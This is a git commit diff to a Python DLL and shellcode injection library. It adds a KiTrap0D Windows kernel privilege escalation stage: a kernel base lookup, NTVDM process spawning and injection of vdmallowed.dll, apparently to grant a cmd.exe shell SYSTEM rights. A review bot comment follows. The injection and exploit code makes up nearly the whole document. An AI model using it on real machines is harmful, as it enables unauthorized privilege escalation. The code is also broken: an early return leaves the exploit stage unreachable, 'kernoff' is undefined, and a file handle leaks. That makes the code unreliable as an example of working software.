Adding in kitrap0d exe stage
psychomario committed May 30, 2012
1 parent 9d38151 commit ca12de0
Showing 1 changed file with 177 additions and 1 deletion.
178 changes: 177 additions & 1 deletion dllinject.py
Expand Up @@ -2,6 +2,7 @@
import ctypes.wintypes as wintypes
import platform
import binascii
import os

wintypes.LPTSTR = ctypes.POINTER(ctypes.c_char)
wintypes.LPBYTE = ctypes.POINTER(ctypes.c_ubyte)
Expand Down Expand Up @@ -60,6 +61,90 @@ class __PROCESS_INFORMATION(ctypes.Structure):
("dwProcessId", wintypes.DWORD),
("dwThreadId", wintypes.DWORD),]
wintypes.PROCESS_INFORMATION = __PROCESS_INFORMATION
class __SYSTEM_MODULE_INFORMATION(ctypes.Structure):
_fields_ = [("ModuleCount", wintypes.ULONG),
("WhoCares", ctypes.c_void_p * 2),
("BaseAddress", ctypes.c_void_p),
("Size", wintypes.ULONG),
("MoarStuff", wintypes.ULONG),
("MoarMoar", wintypes.USHORT),
("HeyThere", wintypes.USHORT),
("Pwned", wintypes.USHORT),
("W00t", wintypes.USHORT),
("ImageName", ctypes.c_char * 256),]
wintypes.SYSTEM_MODULE_INFORMATION = __SYSTEM_MODULE_INFORMATION
class __IMAGE_DOS_HEADER(ctypes.Structure):
_fields_ = [("e_magic", wintypes.WORD),
("e_cblp", wintypes.WORD),
("e_cp", wintypes.WORD),
("e_crlc", wintypes.WORD),
("e_cparhdr", wintypes.WORD),
("e_minalloc", wintypes.WORD),
("e_maxalloc", wintypes.WORD),
("e_ss", wintypes.WORD),
("e_sp", wintypes.WORD),
("e_csum", wintypes.WORD),
("e_ip", wintypes.WORD),
("e_cs", wintypes.WORD),
("e_lfarlc", wintypes.WORD),
("e_ovno", wintypes.WORD),
("e_res", wintypes.WORD * 4),
("e_oemid", wintypes.WORD),
("e_oeminfo", wintypes.WORD),
("e_res2", wintypes.WORD * 10),
("e_lfanew", wintypes.LONG),]
wintypes.IMAGE_DOS_HEADER = __IMAGE_DOS_HEADER
class __IMAGE_FILE_HEADER(ctypes.Structure):
_fields_ = [("Machine", wintypes.WORD),
("NumberOfSections", wintypes.WORD),
("TimeDateStamp", wintypes.DWORD),
("PointerToSymbolTable", wintypes.DWORD),
("NumberOfSymbols", wintypes.DWORD),
("SizeOfOptionalHeader", wintypes.WORD),
("Characteristics", wintypes.WORD),]
wintypes.IMAGE_FILE_HEADER = __IMAGE_FILE_HEADER
class __IMAGE_DATA_DIRECTORY(ctypes.Structure):
_fields_ = [("VirtualAddress", wintypes.DWORD),
("Size", wintypes.DWORD),]
wintypes.IMAGE_DATA_DIRECTORY = __IMAGE_DATA_DIRECTORY
class __IMAGE_OPTIONAL_HEADER(ctypes.Structure):
_fields_ = [("Magic", wintypes.WORD),
("MajorLinkerVersion", wintypes.BYTE),
("MinorLinkerVersion", wintypes.BYTE),
("SizeOfCode", wintypes.DWORD),
("SizeOfInitializedData", wintypes.DWORD),
("SizeOfUninitializedData", wintypes.DWORD),
("AddressOfEntryPoint", wintypes.DWORD),
("BaseOfCode", wintypes.DWORD),
("BaseOfData", wintypes.DWORD),
("ImageBase", wintypes.DWORD),
("SectionAlignment", wintypes.DWORD),
("FileAlignment", wintypes.DWORD),
("MajorOperatingSystemVersion", wintypes.WORD),
("MinorOperatingSystemVersion", wintypes.WORD),
("MajorImageVersion", wintypes.WORD),
("MinorImageVersion", wintypes.WORD),
("MajorSubsystemVersion", wintypes.WORD),
("MinorSubsystemVersion", wintypes.WORD),
("Win32VersionValue", wintypes.DWORD),
("SizeOfImage", wintypes.DWORD),
("SizeOfHeaders", wintypes.DWORD),
("CheckSum", wintypes.DWORD),
("Subsystem", wintypes.WORD),
("DllCharacteristics", wintypes.WORD),
("SizeOfStackReserve", wintypes.DWORD),
("SizeOfStackCommit", wintypes.DWORD),
("SizeOfHeapReserve", wintypes.DWORD),
("SizeOfHeapCommit", wintypes.DWORD),
("LoaderFlags", wintypes.DWORD),
("NumberOfRvaAndSizes", wintypes.DWORD),
("DataDirectory", wintypes.IMAGE_DATA_DIRECTORY * 16),]
wintypes.IMAGE_OPTIONAL_HEADER = __IMAGE_OPTIONAL_HEADER
class __IMAGE_NT_HEADER(ctypes.Structure):
_fields_ = [("Signature", wintypes.DWORD),
("FileHeader", wintypes.IMAGE_FILE_HEADER),
("OptionalHeader", wintypes.IMAGE_OPTIONAL_HEADER),]
wintypes.IMAGE_NT_HEADER = __IMAGE_NT_HEADER

class Process():
"""This class can be used for dll or shellcode injection.
Expand All @@ -79,7 +164,7 @@ class Process():
self.terminate(code)
This will terminate the process in use regardless of where it was
started from. code is the exit code"""
def __init__(self, pid=None, pe=None):
def __init__(self, pid=None, pe=None, handle=None):
self.kernel32 = ctypes.windll.kernel32
self.PROCESS_ALL_ACCESS = (0x000F0000L|0x00100000L|0xFFF)
self.SE_DEBUG_NAME = "SeDebugPrivilege"
Expand Down Expand Up @@ -112,6 +197,8 @@ def __init__(self, pid=None, pe=None):
ctypes.byref(process_information)
)
self.handle = process_information.hProcess
elif handle:
self.handle = handle
else:
return None

Expand Down Expand Up @@ -164,6 +251,7 @@ def inject(self, dllpath): #inject dllpath into our process
and then executes it
"""
dllpath = os.path.abspath(dllpath)
push = "\x68"
dllpath = "\x00".join(list(dllpath))+"\x00\x00\x00"
#convert to null padded unicode
Expand Down Expand Up @@ -263,3 +351,91 @@ def terminate(self, code=0):
code
)
self.kernel32.CloseHandle(self.handle)


def get_kernel_addr():
ntdll = ctypes.windll.ntdll
buffer_size = wintypes.ULONG(0)
ntdll.ZwQuerySystemInformation(11, 0, 0, ctypes.byref(buffer_size));

sysmod_info = ctypes.create_string_buffer(buffer_size.value)
ntdll.ZwQuerySystemInformation(11, ctypes.byref(sysmod_info), buffer_size.value, ctypes.byref(buffer_size));

mod_list = ctypes.cast(sysmod_info, ctypes.POINTER(wintypes.SYSTEM_MODULE_INFORMATION))
return (mod_list[0].BaseAddress, mod_list[0].ImageName.split('\\')[-1], mod_list[0].Size)

def kitrap0d():
kernel32 = ctypes.windll.kernel32

startupinfo = wintypes.STARTUPINFO()
process_information = wintypes.PROCESS_INFORMATION()
startupinfo.dwFlags = 0x1
startupinfo.wShowWindow = 0x1
startupinfo.cb = ctypes.sizeof(startupinfo)
kernel32.CreateProcessA(
"C:\\WINDOWS\\system32\\cmd.exe",
"C:\\WINDOWS\\system32\\cmd.exe",
None,
None,
False,
0x00000010,
None,
None,
ctypes.byref(startupinfo),
ctypes.byref(process_information)
)
givesys = process_information.dwProcessId

kernbase, kernimage, kernsize = get_kernel_addr()
kernhandle = kernel32.LoadLibraryA(kernimage)
xpsig = "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84"
dos_header = ctypes.cast(kernhandle, ctypes.POINTER(wintypes.IMAGE_DOS_HEADER))
nt_header = ctypes.cast(kernhandle + dos_header.contents.e_lfanew, ctypes.POINTER(wintypes.IMAGE_NT_HEADER))
optional_header = nt_header.contents.OptionalHeader
baseofcode = optional_header.BaseOfCode
sizeofcode = optional_header.SizeOfCode
#search between kernelhandle[baseofcode] - kernelhandle[baseofcode+sizeofcode] for xpsig
buf = ctypes.c_byte*kernsize
kernelarray = ctypes.cast(kernhandle, ctypes.POINTER(buf)).contents
fh=open("E:\\file.exe",'wb')
kernelarray = kernelarray[:]
kernelarray = [chr(abs(i)) for i in kernelarray]
return kernelarray
fh.close()
#for i in range(0,kernsize):
# chunk = ''.join([chr(abs(i)) for i in kernelarray[i:i+len(xpsig)]])
# if chunk == xpsig:
# continue
return i



kernel32.SetEnvironmentVariable("VDM_TARGET_PID",hex(givesys))
kernel32.SetEnvironmentVariable("VDM_TARGET_KRN",hex(kernbase))
kernel32.SetEnvironmentVariable("VDM_TARGET_OFF",hex(kernoff))

startupinfo = wintypes.STARTUPINFO()
process_information = wintypes.PROCESS_INFORMATION()
startupinfo.dwFlags = 0x1
startupinfo.wShowWindow = 0x0
startupinfo.cb = ctypes.sizeof(startupinfo)
kernel32.CreateProcessA(
"C:\\WINDOWS\\system32\\debug.exe",
None,
None,
None,
True,
0x00000004,
None,
None,
ctypes.byref(startupinfo),
ctypes.byref(process_information)
)
ntvdm = kernel32.OpenProcess(
0x43b,
False,
process_information.dwProcessId
)

ntvdminject = Process(handle=ntvdm)
ntvdminject.inject("vdmallowed.dll")
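Review bot: Everything in kitrap0d() after the `return kernelarray` that follows the `chr(abs(i))` list comprehension is unreachable — the `fh.close()`, the three SetEnvironmentVariable calls, the second CreateProcessA, the OpenProcess call and the final `Process(handle=ntvdm).inject(...)` never execute, so the stage the commit title announces is dead code as committed; the `return i` inside the commented-out search loop is dead as well. That unreachable tail also references `kernoff`, which is never assigned anywhere in the hunk, and `fh=open("E:\\file.exe",'wb')` two lines above the return is opened on a hard-coded drive path, never written to and never closed because its close sits after the return, so it is either a debugging leftover to remove or a leaked handle. None of the CreateProcessA, LoadLibraryA, OpenProcess or ZwQuerySystemInformation results in this hunk are checked, so a failed call silently yields a NULL handle or an unfilled buffer that then reaches ctypes.cast. If the function is meant to land as work in progress, say so at its top, e.g. `# TODO: stage below is unreachable; kernoff is never assigned`, and give both new top-level functions a one-line docstring. The new `handle=` keyword introduced in the `__init__` hunk should likewise be mentioned in the Process class docstring, which currently documents only the pid/pe paths.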
